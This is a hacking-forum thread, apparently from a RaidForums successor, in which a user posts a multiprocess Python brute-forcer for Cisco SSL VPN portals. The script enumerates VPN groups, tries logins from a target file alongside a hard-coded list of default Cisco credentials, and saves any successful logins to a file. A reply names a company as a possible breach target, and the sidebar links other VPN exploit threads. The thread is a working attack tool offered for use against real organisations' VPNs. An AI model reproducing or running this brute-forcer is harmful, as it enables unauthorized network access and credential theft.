Cisco SSL VPN Bruteforce
by cccp - Monday October 23, 2023 at 09:10 AM
#1
Hello little bf kids, this is a small threaded bruter for cisco ssl vpn that uses the most common cisco credentials. gl with scanning

# cccp on https://raidforums.su/User-cccp import requests from itertools import product from bs4 import BeautifulSoup from collections import namedtuple import urllib3 from concurrent.futures import ProcessPoolExecutor urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_login_resource(url):     url = f"https://{url}/+CSCOE+/logon.html"     try:         response = requests.get(url, verify=False, timeout=5)         if response:             return response     except requests.exceptions.RequestException:         pass     return False def enumerate_vpn_groups(url):     group_name_regex = r"<select id=\"group_list\".*?onchange=\"updateLogonForm\(this\.value,{(.*)}"     response = get_login_resource(url)     groups = set()     if response and response.status_code == 200:         soup = BeautifulSoup(response.text, 'html.parser')         group_list = soup.find('select', {'id': 'group_list'})         if group_list:             for option in group_list.find_all('option'):                 groups.add(option['value'])     return groups def report_cred(url, user, password, group):     # Implement your report logic here     pass def do_login(url, user, password, group):     url = f"https://{url}/+webvpn+/index.html"     cookies = {         'webvpn': '',         'webvpnc': '',         'webvpn_portal': '',         'webvpnSharePoint': '',         'webvpnlogin': '1',         'webvpnLang': 'en'     }     post_params = {         'tgroup': '',         'next': '',         'tgcookieset': '',         'username': user,         'password': password,         'Login': 'Logon'     }     if group != "":         post_params['group_list'] = group     try:         response = requests.post(url, cookies=cookies, data=post_params, verify=False)         print("attempt: ", url)         if response and response.status_code == 200 and 'SSL VPN Service' in response.text and 'webvpn_logout' in response.text.lower():             fmtstr = f"User: {user}, Password: {password}, Workgroup: {group}, Host: {url}"             print(fmtstr)             with open("app_ssl.txt", "a") as iowriter:                 iowriter.write(fmtstr + "\n")                 iowriter.close()             return True         else:             return False     except requests.exceptions.RequestException:         return False def brute_force(url, users, passwords, groups):     for user, password, group in product(users, passwords, groups):         if do_login(url, user, password, group):             return pairs = ['admin:abc123', 'admin:letmein', 'test:test', 'Administrator:admin', 'root:secur4u', 'test:P@ssw0rd', 'admin:changeme', 'admin:diamond', 'admin:tsunami', 'Cisco:Cisco', 'admin:1234', 'admin:test', 'test:test123', 'test:password', 'admin:cisco', 'test:pass', 'test:1234', 'admin:password', 'admin:default', 'admin:admin', 'root:attack', 'cisco:cisco', 'admin:123456', 'admin:pass', 'test:123456', 'root:Cisco', 'root:password'] def main(entry):     try:         url = entry.split(":")[0]         users = [entry.split(":")[1]]         passwords = [entry.split(":")[2]]         groups = ['']         if get_login_resource(url):             groups = enumerate_vpn_groups(url)             if not groups:                 groups = ['DefaultWEBVPNGroup']             brute_force(url, users, passwords, groups)     except:         pass yes = open("loginz.txt", "r").read().split("\n") with ProcessPoolExecutor(max_workers=50) as executor:     results = list(executor.map(main, yes))
Ban reason: Malware | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect.
http://raiddfzn73ir6iyxlf7nwytnujiflddog...7hqd.onion

STrojan/Win32.WannaCryptor.R200571
(Permanent)
Reply
#2
I do know Iheartradio uses cisco vpn but I never really tried the breach to it yet.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Ivanti/Pulse VPN Client Exploit leading to a privilege escalation Loki 18 1,854 01-31-2026, 02:18 AM
Last Post: Aguilar122
  Cisco ISE - Unauthenticated RCE antisocial 1 170 07-29-2025, 06:50 AM
Last Post: JamesStrong
  Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) creek97 0 4,174 11-23-2023, 02:30 PM
Last Post: creek97
  126x CISCO SSL VPN cccp 4 3,183 11-15-2023, 10:08 PM
Last Post: ScoobyDoo



 Users browsing this thread: 1 Guest(s)